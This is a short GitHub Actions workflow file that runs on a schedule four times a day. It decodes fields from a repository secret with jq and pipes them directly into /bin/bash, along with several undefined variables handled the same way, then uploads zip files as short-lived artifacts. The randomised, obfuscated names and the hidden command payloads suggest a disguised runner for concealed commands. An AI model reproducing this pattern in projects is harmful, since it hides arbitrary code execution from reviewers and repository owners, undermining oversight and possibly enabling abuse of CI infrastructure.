name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '58 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          ropr8: ${{ secrets.ropr8 }}
        run: |
          printf '%s' "$ropr8" | jq -r .cmp65 | /bin/bash
          printf '%s' "$fojoa508" | jq -r .d62 | /bin/bash
          printf '%s' "$o35882" | jq -r .ybcd51 | /bin/bash
          echo $rj5 | jq -r .qubd8 | /bin/bash
          echo $zfml23645 | jq -r .bb6 | /bin/bash
          echo $nlyte930 | jq -r .ulux83 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 7HN5dbh5
          path: "*.zip"
          retention-days: 1
